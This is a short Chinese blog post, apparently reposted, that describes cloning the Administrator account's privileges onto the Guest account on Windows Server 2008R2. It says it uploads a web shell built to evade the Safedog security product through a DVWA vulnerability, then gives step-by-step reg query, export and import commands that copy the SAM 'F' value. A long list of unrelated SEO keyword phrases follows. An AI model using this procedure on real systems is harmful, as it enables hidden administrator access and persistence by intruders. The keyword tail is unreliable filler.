记一次克隆管理员的经历
发表于:2024-09-22 作者:千家信息网编辑
千家信息网最后更新 2024年09月22日,半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了还好本地登录的安全策略留了一个guest用户本地搭建了DVWA WEB***测试环境 权限为system通过漏洞上
千家信息网最后更新 2024年09月22日记一次克隆管理员的经历
半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了
还好本地登录的安全策略留了一个guest用户
本地搭建了DVWA WEB***测试环境 权限为system
通过漏洞上传过狗一句话***
***权限为system权限
可以创建用户 但是无法将用户添加至管理员组 估计是安全狗拦截了提权操作
随后将管理员权限克隆至login用户 登录成功
目标将把Guest提权为Administrator
查询SAM注册表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users
查询用户名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names
000001F4的配置文件对应的用户为Administrator
000001F5的配置文件对应的用户为Guest
然后把注册表下的键值导出
先把Administrator的键值导出 保存到C盘名称为1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的键值导出 保存到C盘名称为2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg
然后将1.reg "F"的键值数据复制下来 替换2.reg里面的"F"键值
然后在把2.reg导入到注册表
Reg import c:\2.reg
最后使用guest登录
用户家目录等 都变成了Administrator的数据
实际上就是Administrator=Guest
用户
权限
文件
注册表
登录
配置
管理员
管理
安全
名称
数据
系统
查询
成功
一句话
下有
实际
实际上
密码
就是
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
oracle免费服务器怎么用
文件服务器怎么管理软件
上线提醒软件开发
机房服务器办公室管理
新聚变服务器
网络安全专业张雪峰
黑客进入数据库技术
计算机网络安全文献6
数据库查找语句用到索引
国信招标网络安全
无法连接服务器安全模式
代理服务器 设计
机电网络安全管理制度
steam加速用什么服务器
数据库逻辑设计是表吗
网络安全意识形态工作汇报
软件开发怎么写
台州棋牌软件开发
服务器启动但是显示器没有显示
系统服务器dan机
网络安全法是哪个部门颁布的
安全狗服务器名怎么查
邮件列表服务器
315网络安全内容
无锡营销软件开发管理
吉普车视频软件开发
网络安全与信息化的基础是什么
2021最新网络安全法规
网络安全知识图谱论文
第一届国家网络安全宣传
